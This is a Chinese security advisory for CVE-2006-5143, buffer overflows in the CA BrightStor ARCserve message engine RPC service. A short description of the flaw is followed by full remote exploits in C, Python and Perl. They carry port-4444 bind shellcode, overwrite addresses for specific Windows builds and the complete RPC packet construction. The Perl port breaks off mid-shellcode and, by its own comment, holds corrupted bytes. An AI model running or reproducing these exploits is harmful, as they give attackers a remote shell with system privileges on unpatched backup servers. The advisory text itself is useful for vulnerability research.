CA多个产品消息引擎RPC服务器多个缓冲区溢出漏洞

发布日期:2006-10-05
更新日期:2006-11-23

受影响系统:
Computer Associates BrightStor ARCserve Backup 9.01
Computer Associates BrightStor ARCserve Backup 11.5
Computer Associates BrightStor Enterprise Backup 10.5
Computer Associates Server Protection r2
Computer Associates Business Protection r2
描述:
BUGTRAQ  ID: 20365
CVE(CAN) ID: CVE-2006-5143

Computer Associates是世界领先的安全厂商,产品包括多种杀毒软件及备份恢复系统。

CA多个产品的消息引擎处理用户请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。

ASCORE.dll是CA多个产品的消息引擎RPC服务器所使用的DLL。消息引擎(msgeng.exe)在TCP 6503端口上处理发往接口UUID为dc246bf0-7a7a-11ce-9f88-00805fe43838的端点的RPC请求时,可能触发一个堆溢出(Opnum 43)和一个栈溢出(Opnum 45)。远程攻击者只要把超长字符串作为上述任一opnum的第二个参数发送,即可以系统权限执行任意指令。注意:下文的测试代码依赖特定操作系统及补丁级别的固定地址(例如UnhandledExceptionFilter的地址),并非对所有受影响版本都通用。

<*来源:livesploit.com (http://www.livesploit.com/)
  
  链接:http://secunia.com/advisories/22285/
        http://marc.theaimsgroup.com/?l=bugtraq&m=116015138022626&w=2
        http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp
        http://www.lssec.com/advisories/LS-20060313.pdf
        http://www.lssec.com/advisories/LS-20060330.pdf
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/*
* LSsec.com
*
* CA BrightStor ARCserve Backup v11.5 Message Engine Remote Heap Overflow Exploit
*
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32")
#pragma pack(1)

#define _DCE_RPC_REQ  0x00
#define _DCE_RPC_BIND 0x0B

#define PKT_LEN  2048+24
#define STUB_LEN 2048

/* "\xeb\x0a" = short jmp +10: placed at stub+680 by lsDceRpcReq, it skips the
 * two 4-byte pointers that follow and lands in bindshell at stub+692; the two
 * NOPs are padding (the Perl port's comment: "JMP over ret and uef"). */
unsigned char jmp[]="\xeb\x0a\x90\x90";
/* 0x2d4075bf little-endian.  Per the comment in lsDceRpcReq this is a
 * "call dword ptr ds:[esi+48]" gadget; the Perl listing attributes it to
 * qclient.dll on Win2k SP4 English.  Target-specific - verify per build. */
unsigned char esi[]="\xbf\x75\x40\x2d";
/* 0x7c54144c little-endian: the value written over UnhandledExceptionFilter
 * (see lsDceRpcReq).  The Perl listing lists this as Win2k SP4 English; it is
 * only valid for that OS/SP. */
unsigned char uef[]="\x4c\x14\x54\x7c";

/* Port-binding payload: the "4444" note and the Perl port's final
 * "telnet $host 4444" indicate a listener on TCP 4444.  The leading bytes
 * (xor ecx,ecx / sub ecx,-0x50 / fldz / fnstenv / pop ebx / xor [ebx+13],key /
 * loop) look like a self-decoding XOR stub, so the rest is not readable
 * as-is.  The Python listing below carries identical bytes; the Perl
 * listing's copy differs in its 2nd-8th lines. */
unsigned char bindshell[]=
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0"
"\x6f\xe3\x2a\x83\xeb\xfc\xe2\xf4\x1c\x05\x08\x67\x08\x96\x1c\xd5"
"\x1f\x0f\x68\x46\xc4\x4b\x68\x6f\xdc\xe4\x9f\x2f\x98\x6e\x0c\xa1"
"\xaf\x77\x68\x75\xc0\x6e\x08\x63\x6b\x5b\x68\x2b\x0e\x5e\x23\xb3"
"\x4c\xeb\x23\x5e\xe7\xae\x29\x27\xe1\xad\x08\xde\xdb\x3b\xc7\x02"
"\x95\x8a\x68\x75\xc4\x6e\x08\x4c\x6b\x63\xa8\xa1\xbf\x73\xe2\xc1"
"\xe3\x43\x68\xa3\x8c\x4b\xff\x4b\x23\x5e\x38\x4e\x6b\x2c\xd3\xa1"
"\xa0\x63\x68\x5a\xfc\xc2\x68\x6a\xe8\x31\x8b\xa4\xae\x61\x0f\x7a"
"\x1f\xb9\x85\x79\x86\x07\xd0\x18\x88\x18\x90\x18\xbf\x3b\x1c\xfa"
"\x88\xa4\x0e\xd6\xdb\x3f\x1c\xfc\xbf\xe6\x06\x4c\x61\x82\xeb\x28"
"\xb5\x05\xe1\xd5\x30\x07\x3a\x23\x15\xc2\xb4\xd5\x36\x3c\xb0\x79"
"\xb3\x3c\xa0\x79\xa3\x3c\x1c\xfa\x86\x07\xf2\x76\x86\x3c\x6a\xcb"
"\x75\x07\x47\x30\x90\xa8\xb4\xd5\x36\x05\xf3\x7b\xb5\x90\x33\x42"
"\x44\xc2\xcd\xc3\xb7\x90\x35\x79\xb5\x90\x33\x42\x05\x26\x65\x63"
"\xb7\x90\x35\x7a\xb4\x3b\xb6\xd5\x30\xfc\x8b\xcd\x99\xa9\x9a\x7d"
"\x1f\xb9\xb6\xd5\x30\x09\x89\x4e\x86\x07\x80\x47\x69\x8a\x89\x7a"
"\xb9\x46\x2f\xa3\x07\x05\xa7\xa3\x02\x5e\x23\xd9\x4a\x91\xa1\x07"
"\x1e\x2d\xcf\xb9\x6d\x15\xdb\x81\x4b\xc4\x8b\x58\x1e\xdc\xf5\xd5"
"\x95\x2b\x1c\xfc\xbb\x38\xb1\x7b\xb1\x3e\x89\x2b\xb1\x3e\xb6\x7b"
"\x1f\xbf\x8b\x87\x39\x6a\x2d\x79\x1f\xb9\x89\xd5\x1f\x58\x1c\xfa"
"\x6b\x38\x1f\xa9\x24\x0b\x1c\xfc\xb2\x90\x33\x42\x10\xe5\xe7\x75"
"\xb3\x90\x35\xd5\x30\x6f\xe3\x2a";

/*
 * DCE RPC v5 common PDU header, 16 bytes on the wire (1+1+1+1+4+2+2+4).
 * Fields are stored host-order and sent raw; data_repres is set to 16 by the
 * builders below, the usual NDR "little-endian integer, ASCII" byte, so this
 * only serialises correctly on a little-endian build.  `unsigned long` must
 * be 4 bytes (Win32 / Win64 LLP64); on an LP64 platform the header would be
 * 24 bytes and every PDU malformed.  #pragma pack(1) above removes padding.
 */
typedef struct dceRpc{
    unsigned char    ver;          /* protocol major version (5) */
    unsigned char    ver_minor;    /* protocol minor version (0) */
    unsigned char    pkt_type;     /* _DCE_RPC_BIND or _DCE_RPC_REQ */
    unsigned char    pkt_flags;    /* packet flags byte (3 in both builders) */
    unsigned long    data_repres;  /* NDR data representation (16) */
    unsigned short    frag_len;    /* total PDU length incl. this header */
    unsigned short    auth_len;    /* auth trailer length, always 0 here */
    unsigned long    caller_id;    /* call id chosen by the caller */
} DCE_RPC, *PDCE_RPC;

/*
 * REQUEST-specific header that follows DCE_RPC, 8 bytes on the wire (4+2+2).
 * Same `unsigned long` == 4 bytes assumption as DCE_RPC.
 */
typedef struct dceRpc2{
    unsigned long    alloc_hint;   /* hint of stub size (STUB_LEN below) */
    unsigned short    con_id;      /* presentation context id (0) */
    unsigned short    opnum;       /* operation number on the interface */
} DCE_RPC2, *PDCE_RPC2;

/*
 * Fixed part of the BIND body that follows DCE_RPC, 16 bytes on the wire
 * (2+2+4+4+2+2); the interface UUID/version and transfer syntax are
 * appended after it by lsDceRpcBind.  Same `unsigned long` == 4 bytes
 * assumption as DCE_RPC.
 */
typedef struct dceRpcBind{
    unsigned short    max_xmit;       /* max transmit fragment (0x16D0) */
    unsigned short    max_recv;       /* max receive fragment (0x16D0) */
    unsigned long    asc_group;       /* association group id (0 = new) */
    unsigned long    num_con_items;   /* number of context items (1) */
    unsigned short    con_id;         /* context id of the single item (0) */
    unsigned short    num_trn_items;  /* transfer syntaxes in that item (1) */
} DCE_RPC_BIND, *PDCE_RPC_BIND;

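/* Value of one hex digit (either case), or -1 if `c` is not a hex digit. */
static int
lsHexVal(unsigned char c)
{
    if(c>='0'&&c<='9') return c-'0';
    if(c>='a'&&c<='f') return c-'a'+10;
    if(c>='A'&&c<='F') return c-'A'+10;
    return -1;
}

/*
 * Decode a hex string into raw bytes.
 *
 * s   : NUL-terminated hex text, two digits per output byte.
 * out : receives at most strlen(s)/2 bytes; the caller sizes it.
 *
 * Returns the number of bytes written.  Decoding stops at the first
 * character that is not a hex digit and ignores a dangling odd digit.
 * The original accepted only lower-case digits (an upper-case 'A' became
 * garbage via 'A'-'a'+10) and, for odd-length input, treated the
 * terminating NUL as a digit.
 */
int
lsHex2Raw(unsigned char* s, unsigned char* out)
{
    unsigned long len=strlen((const char*)s);
    unsigned long i;
    int ret=0;

    for(i=0; i+1<len; i+=2){
        int hi=lsHexVal(s[i]);
        int lo=lsHexVal(s[i+1]);

        if(hi<0||lo<0)
            break;
        out[ret++]=(unsigned char)((hi<<4)|lo);
    }

    return(ret);
}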

/*
 * Reverse the first `len` bytes of `io` in place.  lsEncodeUuid uses this to
 * turn the textual (big-endian) order of the first three UUID fields into
 * the little-endian order DCE RPC puts on the wire.  len == 0 is a no-op.
 */
void
lsInverse(unsigned char* io, unsigned long len)
{
    unsigned char* lo=io;
    unsigned char* hi=io+len;

    while(lo<hi){
        unsigned char t;

        hi--;
        t=*lo;
        *lo=*hi;
        *hi=t;
        lo++;
    }
}

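/* Value of one hex digit (either case), or -1 if `c` is not a hex digit. */
static int
lsUuidHexVal(unsigned char c)
{
    if(c>='0'&&c<='9') return c-'0';
    if(c>='a'&&c<='f') return c-'a'+10;
    if(c>='A'&&c<='F') return c-'A'+10;
    return -1;
}

/*
 * Encode a textual UUID ("xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx") into its
 * 16-byte DCE RPC wire form: the first three fields (time_low, time_mid,
 * time_hi_and_version) are emitted little-endian, the last two (clock_seq,
 * node) keep their textual byte order.
 *
 * uuid : the text.  Unlike the original, the input is not modified (the
 *        original overwrote each '-' with NUL, which is why main keeps a
 *        scratch copy) and no stray NUL is written at out[strlen(uuid)],
 *        i.e. past the encoded bytes.
 * out  : receives 16 bytes on success; the caller sizes it.
 *
 * Returns 16 for a well-formed UUID, or 0 if the text does not have the
 * 8-4-4-4-12 shape or contains a non-hex character.  Callers that use the
 * return value as an offset therefore advance by 0 on bad input instead of
 * by an arbitrary count.
 */
int
lsEncodeUuid(unsigned char* uuid, unsigned char* out)
{
    static const unsigned long groupLen[5]={8,4,4,4,12};
    unsigned long g;
    unsigned long pos=0;
    unsigned long cnt=0;

    for(g=0; g<5; g++){
        unsigned long n=groupLen[g]/2;
        unsigned long k;

        if(g>0){
            if(uuid[pos]!='-')
                return(0);
            pos++;
        }
        for(k=0; k<n; k++){
            int hi;
            int lo;
            unsigned char b;

            /* check the first digit before touching the second so a short
             * string never reads past its terminator */
            hi=lsUuidHexVal(uuid[pos+2*k]);
            if(hi<0)
                return(0);
            lo=lsUuidHexVal(uuid[pos+2*k+1]);
            if(lo<0)
                return(0);
            b=(unsigned char)((hi<<4)|lo);
            if(g<3)
                out[cnt+(n-1-k)]=b;   /* byte-swapped on the wire */
            else
                out[cnt+k]=b;
        }
        pos+=groupLen[g];
        cnt+=n;
    }
    if(uuid[pos]!='\0')
        return(0);

    return((int)cnt);
}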

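/*
 * Build a DCE RPC v5 BIND PDU for interface `uuid` (major version `ver`,
 * minor 0): one context, one transfer syntax (NDR, version 2).
 *
 * cid    : call id placed in the header.
 * uuid   : textual interface UUID, passed to lsEncodeUuid.
 * ver    : interface major version.
 * pktLen : receives the PDU length, which is also written into frag_len.
 *
 * Returns a calloc'd buffer that the caller frees.  Allocation failure
 * prints "[-] ..." and exits, the convention used by lsConnect and friends,
 * because no caller checks for NULL.
 *
 * Wire layout: 16-byte common header, 16-byte bind body, 16-byte UUID,
 * 2+2 byte interface version, 16-byte transfer syntax, 4-byte syntax
 * version = 72 bytes (0x48, the same frag length the Perl listing hard-codes).
 * The original wrote only two bytes of the 4-byte syntax version and added
 * "+2" to the length, relying on calloc's zero fill; all four bytes are now
 * written explicitly.
 */
unsigned char*
lsDceRpcBind(unsigned long cid, unsigned char* uuid, unsigned short ver, unsigned long* pktLen){
    unsigned char* base;
    unsigned char* p;
    unsigned char  transferSyntax[]="8a885d04-1ceb-11c9-9fe8-08002b104860";
    unsigned short fragLen;
    unsigned long  cnt;
    PDCE_RPC_BIND rpc_bind;
    PDCE_RPC rpc;

    base=(unsigned char*)calloc(2048, 1);
    if(base==NULL){
        printf("[-] calloc failed\n");
        exit(1);
    }

    /* body first; the header needs the final length */
    p=base+sizeof(DCE_RPC);
    rpc_bind=(PDCE_RPC_BIND)p;
    rpc_bind->max_xmit      = 0x16D0;        //Max Xmit Frag
    rpc_bind->max_recv      = 0x16D0;        //Max Recv Frag
    rpc_bind->asc_group     = 0;             //Assoc Group
    rpc_bind->num_con_items = 1;             //Num Ctx Items
    rpc_bind->con_id        = 0;             //Context ID
    rpc_bind->num_trn_items = 1;             //Num Trans Items
    p+=sizeof(DCE_RPC_BIND);

    cnt=lsEncodeUuid(uuid, p);               //Interface UUID (16 bytes)
    p+=cnt;
    memcpy(p, &ver, sizeof(short));          //Interface Ver
    p+=sizeof(short);
    *p++=0;                                  //Interface Ver Minor (lo)
    *p++=0;                                  //Interface Ver Minor (hi)
    cnt=lsEncodeUuid(transferSyntax, p);     //Transfer Syntax (16 bytes)
    p+=cnt;
    *p++=2;                                  //Transfer Syntax Ver 2.0, 4 bytes
    *p++=0;
    *p++=0;
    *p++=0;

    fragLen=(unsigned short)(p-base);
    rpc=(PDCE_RPC)base;
    rpc->ver         = 5;                    //Version
    rpc->ver_minor   = 0;                    //Version (minor)
    rpc->pkt_type    = _DCE_RPC_BIND;        //Packet Type
    rpc->pkt_flags   = 3;                    //Packet Flags
    rpc->data_repres = 16;                   //Data Representation
    rpc->frag_len    = fragLen;              //Frag Length
    rpc->auth_len    = 0;                    //Auth Length
    rpc->caller_id   = cid;                  //Call ID

    *pktLen=fragLen;

    return(base);
}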

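/*
 * Build a DCE RPC v5 REQUEST PDU whose stub is the overflow trigger.
 *
 * cid      : call id.
 * opnum    : operation number (the advisory names 43 and 45; main uses 43).
 * uuid     : interface UUID, encoded into the PDU only when `encoding` is
 *            non-zero; main passes 0.
 * encoding : see `uuid`.
 * flags    : header packet-flags byte.
 * pktLen   : receives the PDU length, also written into frag_len.
 *
 * Returns a calloc'd buffer that the caller frees.  Allocation failure
 * prints "[-] ..." and exits (file convention; callers never check NULL).
 *
 * Stub layout (STUB_LEN bytes, NOP-filled; offsets are the file's own):
 *   +680  jmp        short jump over the two pointers below
 *   +684  esi        "call dword ptr ds:[esi+48]" gadget address
 *   +688  uef        value written over UnhandledExceptionFilter
 *   +692  bindshell  payload
 *
 * Fix: the original always allocated PKT_LEN (= 24 + STUB_LEN) bytes, so
 * with `encoding` set the UUID bytes pushed the STUB_LEN memcpy 16 bytes
 * past the end of the heap buffer.  The buffer is now sized from what is
 * actually written.
 */
unsigned char*
lsDceRpcReq(unsigned long  cid, unsigned long opnum, unsigned char* uuid, unsigned int encoding, unsigned long flags, unsigned long* pktLen){
    unsigned char* base;
    unsigned char* p;
    unsigned char  stub[STUB_LEN];
    unsigned long  bufLen;
    unsigned short fragLen;
    unsigned long  cnt;
    PDCE_RPC  rpc;
    PDCE_RPC2 rpc2;

    bufLen=sizeof(DCE_RPC)+sizeof(DCE_RPC2)+STUB_LEN;
    if(encoding)
        bufLen+=strlen((const char*)uuid);  /* upper bound on the encoded UUID */

    base=(unsigned char*)calloc(bufLen, 1);
    if(base==NULL){
        printf("[-] calloc failed\n");
        exit(1);
    }

    /* body first; the header needs the final length */
    p=base+sizeof(DCE_RPC);
    rpc2=(PDCE_RPC2)p;
    rpc2->alloc_hint = STUB_LEN;                //Stub Data
    rpc2->con_id     = 0;                       //Context ID
    rpc2->opnum      = (unsigned short)opnum;   //Operation Number
    p+=sizeof(DCE_RPC2);

    if(encoding){
        cnt=lsEncodeUuid(uuid, p);              //Interface UUID
        p+=cnt;
    }

    /* NOP sled with the jump, the two pointers and the payload at the
     * fixed offsets listed in the header comment */
    memset(stub, 0x90, STUB_LEN);
    memcpy(stub+680, jmp, sizeof(jmp)-1);
    memcpy(stub+684, esi, sizeof(esi)-1);       //call dword ptr ds:[esi+48]
    memcpy(stub+688, uef, sizeof(uef)-1);       //UnhandledExceptionFilter
    memcpy(stub+692, bindshell, sizeof(bindshell)-1);

    memcpy(p, stub, STUB_LEN);
    p+=STUB_LEN;

    fragLen=(unsigned short)(p-base);
    rpc=(PDCE_RPC)base;
    rpc->ver         = 5;                       //Version
    rpc->ver_minor   = 0;                       //Version (minor)
    rpc->pkt_type    = _DCE_RPC_REQ;            //Packet Type
    rpc->pkt_flags   = (unsigned char)flags;    //Packet Flags
    rpc->data_repres = 16;                      //Data Representation
    rpc->frag_len    = fragLen;                 //Frag Length
    rpc->auth_len    = 0;                       //Auth Length
    rpc->caller_id   = cid;                     //Call ID

    *pktLen=fragLen;

    return(base);
}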

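/*
 * Resolve `host`, open a TCP socket and connect it to `port`.
 *
 * Returns the connected socket.  Every failure prints "[-] ..." and exits,
 * matching the rest of the file; nothing in the program closes the socket
 * or calls WSACleanup, so both are reclaimed at process exit.
 *
 * Fix: WSAStartup's result was ignored, so a failed Winsock initialisation
 * fell through to gethostbyname() and surfaced as a misleading
 * "unable to resolve" message.
 *
 * NOTE(review): `int s` narrows the SOCKET handle; fine on the 32-bit
 * targets this was written for, but the `< 0` checks assume the invalid
 * handle reads as -1 when truncated - confirm if built for 64-bit.
 */
int
lsConnect(unsigned char* host, unsigned short port){
    int s;
    struct hostent* he;
    struct sockaddr_in addr;
    WSADATA wsa;

    if(WSAStartup(MAKEWORD(2,0), &wsa)!=0){
        printf("[-] WSAStartup failed\n");
        exit(1);
    }

    he=gethostbyname(host);
    if(he==NULL){
        printf("[-] unable to resolve %s\n", host);
        exit(1);
    }

    s=socket(AF_INET, SOCK_STREAM, 0);
    if(s<0){
        printf("[-] socket failed\n");
        exit(1);
    }

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port   = htons(port);
    /* first resolved address; memcpy avoids the unaligned struct cast */
    memcpy(&addr.sin_addr, he->h_addr, sizeof(addr.sin_addr));

    if(connect(s, (struct sockaddr*)&addr, sizeof(addr))<0){
        printf("[-] connect failed\n");
        exit(1);
    }

    return(s);
}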

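/*
 * Send all `cnt` bytes of `pkt` on socket `s`.
 *
 * Fix: the original issued a single send() and only checked for -1, so a
 * short write silently truncated the PDU.  Loop until everything is out;
 * an error (or a zero-byte send, which would otherwise spin) prints
 * "[-] send failed" and exits, like the other helpers.
 */
void
lsSend(int s, unsigned char* pkt, unsigned long cnt){
    unsigned long done=0;

    while(done<cnt){
        int n=send(s, (const char*)pkt+done, (int)(cnt-done), 0);

        if(n<=0){
            printf("[-] send failed\n");
            exit(1);
        }
        done+=(unsigned long)n;
    }
}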

/*
 * Read and discard one chunk (up to 4096 bytes) of whatever the server
 * sends back; the reply is never parsed.  A closed connection or an error
 * prints "[-] recv failed" and exits, like the other helpers.
 */
void
lsRecv(int s){
    char scratch[4096];
    int got;

    got=recv(s, scratch, sizeof(scratch), 0);
    if(got<=0){
        printf("[-] recv failed\n");
        exit(1);
    }
}

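/*
 * Entry point.  argv[1] is the target host.  Binds to the message-engine
 * interface on TCP 6503, then sends a single REQUEST for opnum 43 carrying
 * the overflow stub; per the "4444" note on bindshell and the Perl listing's
 * telnet step, success leaves the payload's listener on TCP 4444.
 *
 * Fix: the scratch copy of the UUID used strncpy with the source length,
 * which only stayed NUL-terminated thanks to the preceding memset.  The copy
 * now takes sizeof(uuid), terminator included, into the 64-byte buffer.
 */
int
main(int argc, char* argv[]){
    int s;
    unsigned long  cnt;
    unsigned char* pkt=NULL;
    unsigned char  uuidSave[64];

    /**********************************************************/

    int opnum=43;                 /* advisory: 43 (heap) or 45 (stack) */
    unsigned short port= 6503;
    unsigned char  uuid[]="dc246bf0-7a7a-11ce-9f88-00805fe43838";

    /**********************************************************/

    if(argc!=2){
        printf("\n[-] Usage: %s <ip>\n", argv[0]);
        exit(1);
    }

    printf("\n[+] LSsec.com\n");
    printf("\n[+] CA BrightStor ARCserve Backup v11.5 Message Engine Remote Heap Overflow Exploit\n");

    s=lsConnect((unsigned char*)argv[1], port);

    /* lsEncodeUuid as originally written overwrites the dashes of its input
     * with NULs, so the bind consumes `uuid` and the request gets a pristine
     * copy (37 bytes incl. terminator, well inside the 64-byte buffer). */
    memcpy(uuidSave, uuid, sizeof(uuid));

    //bind packet
    pkt=lsDceRpcBind(1, uuid, 1, &cnt);
    lsSend(s, pkt, cnt);
    lsRecv(s);
    free(pkt);
    pkt=NULL;

    //request
    pkt=lsDceRpcReq(1, opnum, uuidSave, 0, 0x03, &cnt);
    lsSend(s, pkt, cnt);
    lsRecv(s);
    free(pkt);
    pkt=NULL;

    return(0);
}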



#!/usr/bin/python
# I couldn't find a reliable exploit for my analysis and so came up with this.
# Remote exploit for the CA BrightStor msgeng.exe service heap overflow
# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was
# tested on Windows 2000 SP0 only. Opens a shell on TCP port 4444. Shouldn't be
# hard to port to other platforms, but both addresses below are specific to
# that build. The exploit overwrites the
# UnhandledExceptionFilter in Windows 2000 SP0 (located at 77EE044C) with the
# address of a "call dword ptr [esi+4C]" located in user32.dll. At the time
# UEF is called, [esi+4C] contains a pointer to our shellcode.
#
# Winny M Thomas ;-)
# Author shall bear no responsibility for any screw ups caused by using this code

from impacket.dcerpc import transport, dcerpc
from impacket import uuid
import struct
import sys

def DCEconnectAndExploit(target):
    """Bind to the msgeng.exe interface on TCP 6503 and send the overflow.

    The stub is: 676 filler bytes, four NOPs, two NOPs plus a short jump
    (EB 0A) over the two pointers that follow, the address of a
    "call dword ptr [esi+4C]" gadget in user32.dll, the value written over
    UnhandledExceptionFilter (both Windows 2000 SP0 addresses, see the
    header comment), eight NOPs, then the port-4444 bind shellcode.  It is
    sent as opnum 43 with no authentication.
    """
    rpc_transport = transport.TCPTransport(target, 6503)
    rpc_transport.connect()
    rpc = dcerpc.DCERPC_v5(rpc_transport)
    rpc.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))

    # Port-binding shellcode; opens a shell on TCP port 4444.
    shellcode = (
        "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0"
        "\x6f\xe3\x2a\x83\xeb\xfc\xe2\xf4\x1c\x05\x08\x67\x08\x96\x1c\xd5"
        "\x1f\x0f\x68\x46\xc4\x4b\x68\x6f\xdc\xe4\x9f\x2f\x98\x6e\x0c\xa1"
        "\xaf\x77\x68\x75\xc0\x6e\x08\x63\x6b\x5b\x68\x2b\x0e\x5e\x23\xb3"
        "\x4c\xeb\x23\x5e\xe7\xae\x29\x27\xe1\xad\x08\xde\xdb\x3b\xc7\x02"
        "\x95\x8a\x68\x75\xc4\x6e\x08\x4c\x6b\x63\xa8\xa1\xbf\x73\xe2\xc1"
        "\xe3\x43\x68\xa3\x8c\x4b\xff\x4b\x23\x5e\x38\x4e\x6b\x2c\xd3\xa1"
        "\xa0\x63\x68\x5a\xfc\xc2\x68\x6a\xe8\x31\x8b\xa4\xae\x61\x0f\x7a"
        "\x1f\xb9\x85\x79\x86\x07\xd0\x18\x88\x18\x90\x18\xbf\x3b\x1c\xfa"
        "\x88\xa4\x0e\xd6\xdb\x3f\x1c\xfc\xbf\xe6\x06\x4c\x61\x82\xeb\x28"
        "\xb5\x05\xe1\xd5\x30\x07\x3a\x23\x15\xc2\xb4\xd5\x36\x3c\xb0\x79"
        "\xb3\x3c\xa0\x79\xa3\x3c\x1c\xfa\x86\x07\xf2\x76\x86\x3c\x6a\xcb"
        "\x75\x07\x47\x30\x90\xa8\xb4\xd5\x36\x05\xf3\x7b\xb5\x90\x33\x42"
        "\x44\xc2\xcd\xc3\xb7\x90\x35\x79\xb5\x90\x33\x42\x05\x26\x65\x63"
        "\xb7\x90\x35\x7a\xb4\x3b\xb6\xd5\x30\xfc\x8b\xcd\x99\xa9\x9a\x7d"
        "\x1f\xb9\xb6\xd5\x30\x09\x89\x4e\x86\x07\x80\x47\x69\x8a\x89\x7a"
        "\xb9\x46\x2f\xa3\x07\x05\xa7\xa3\x02\x5e\x23\xd9\x4a\x91\xa1\x07"
        "\x1e\x2d\xcf\xb9\x6d\x15\xdb\x81\x4b\xc4\x8b\x58\x1e\xdc\xf5\xd5"
        "\x95\x2b\x1c\xfc\xbb\x38\xb1\x7b\xb1\x3e\x89\x2b\xb1\x3e\xb6\x7b"
        "\x1f\xbf\x8b\x87\x39\x6a\x2d\x79\x1f\xb9\x89\xd5\x1f\x58\x1c\xfa"
        "\x6b\x38\x1f\xa9\x24\x0b\x1c\xfc\xb2\x90\x33\x42\x10\xe5\xe7\x75"
        "\xb3\x90\x35\xd5\x30\x6f\xe3\x2a"
    )

    stub = "".join([
        "A" * 676,
        "\x90\x90\x90\x90",
        "\x90\x90\xeb\x0a",
        # call dword ptr [esi+4C] in user32.dll (Windows 2000 SP0)
        struct.pack("<L", 0x77E4FB7A),
        # UnhandledExceptionFilter in Windows 2000 SP0
        struct.pack("<L", 0x77EE044C),
        "\x90\x90\x90\x90" * 2,
        shellcode,
    ])

    rpc.call(43, stub)

if __name__ == '__main__':
    # Exactly one positional argument, the target address.  Without it,
    # print the usage line (followed by a blank line, as before) and exit
    # with status -1.
    if len(sys.argv) < 2:
        sys.stdout.write('Usage: %s <target ip>\n' % sys.argv[0] + '\n')
        sys.exit(-1)

    DCEconnectAndExploit(sys.argv[1])




#!/usr/bin/perl
#
# original exploit by lssec.com; this is a Perl port of it
#
# acaro [at] jervus.it


use IO::Socket::INET;
use Switch;

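# Usage check.  Fix: the original required three arguments (hence the odd
# "-o1 -o1" in its example) and, after printing the usage text, carried on
# running with an unset target.  At least the -h switch is needed, so stop
# when nothing was given; -o falls back to target 1 as the text promises.
if (@ARGV < 1) {
print "--------------------------------------------------------------------\n";
print "Usage : BrightStoreARCServer-11-5-4targets.pl -hTargetIPAddress -oTargetReturnAddress\n";
print " Return address: \n";
print " 1 - Windows 2k Sp4 English Version\n";
print " 2 - Windows 2k Sp4 Italian Version\n";
print " 3 - Windows XP Pro Sp1 English Version\n";
print " 4 - Windows XP Pro Sp0 English Version\n";
print " If values not specified, Windows 2k Sp4 will be used.\n";
print " Example : ./BrightStoreARCServer-11-5-4targets.pl -h127.0.0.1 -o1\n";
print "--------------------------------------------------------------------\n";
exit 1;
}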

use IO::Socket::INET;

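# Defaults: target 10.0.0.2 (overridden by -h) and address set 1, Win2k SP4
# English (overridden by -o), which is what the usage text promises.
# Fix: the original wrote the address as a bare 10.0.0.2, which Perl parses
# as a v-string - the four characters chr(10) chr(0) chr(0) chr(2) - rather
# than as dotted-quad text, so the default could never connect.
my $host = '10.0.0.2';
my $port = 6503;
my $reply;
my $request;
my $uef = 1;                   # index into the UEF address table below
my $ret = 1;                   # index into the gadget address table below
my $jmp="\xeb\x0a\x90\x90";    # JMP over ret and uef to our shellcode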




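# Parse -h<dotted quad> and -o<index>.  $host is later handed to an external
# telnet command, so only a dotted quad is accepted; the original's
# -h((.*)\.(.*)\.(.*)\.(.*)) took any text containing three dots, shell
# metacharacters included.  Both $uef and $ret come from the same -o value.
foreach (@ARGV) {
$host = $1 if ($_=~/^-h(\d{1,3}(?:\.\d{1,3}){3})$/);
if ($_=~/^-o(\d+)$/) {
$uef = $1;
$ret = $1;
}
}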




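# Per-target addresses, little-endian packed.  Plain hash lookups replace
# the Switch.pm source filter (no longer shipped with core Perl).  Fix: an
# index outside the table now aborts; the original fell through every case
# and sent the raw option text (or an empty string) as the "address".
my %uef_table = (
1 => "\x4c\x14\x54\x7c",   # Win2k SP4 English version
2 => "\x4c\x14\x68\x79",   # Win2k SP4 Italian  version
3 => "\xb4\x73\xed\x77",   # WinXP Pro English SP1 version
4 => "\xb4\x63\xed\x77",   # WinXP Pro English SP0 version
);
my %ret_table = (
1 => "\xbf\x75\x40\x2d",   # Win2k SP4 English version CALL DWORD PTR DS:[ESI+48] in qclient.dll
2 => "\xbf\x75\x40\x2d",   # Win2k SP4 Italian  version CALL DWORD PTR DS:[ESI+48] in qclient.dll
3 => "\x52\xbf\x04\x78",   # WinXP Pro English SP1 version CALL DWORD PTR DS:[EDI+6c] in RPCRT4.dll
4 => "\xd7\xe9\xd0\x77",   # WinXP Pro English SP0 version CALL DWORD PTR DS:[EDI+6c] in RPCRT4.dll
);
die "Unknown target; use -o1 .. -o4\n"
    unless defined $uef && exists $uef_table{$uef}
        && defined $ret && exists $ret_table{$ret};
$uef = $uef_table{$uef};
$ret = $ret_table{$ret};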




# Port-4444 bind shellcode, nominally the same payload as the C and Python
# listings above.  NOTE(review): lines 2-8 of this copy (the
# "\x00\x91..\xff" run of consecutive byte values) do not match the bytes in
# those two listings, which agree with each other; this looks like a
# corrupted paste, and since the first line is a self-decoding stub that
# XORs what follows, the payload is unlikely to run as-is.  Confirm against
# the C listing before relying on this port.
my $shellcode  =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0".
"\x00\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f".
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf".
"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xbA\xbb\xbc\xbd\xbe\xbf".
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf".
"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf".
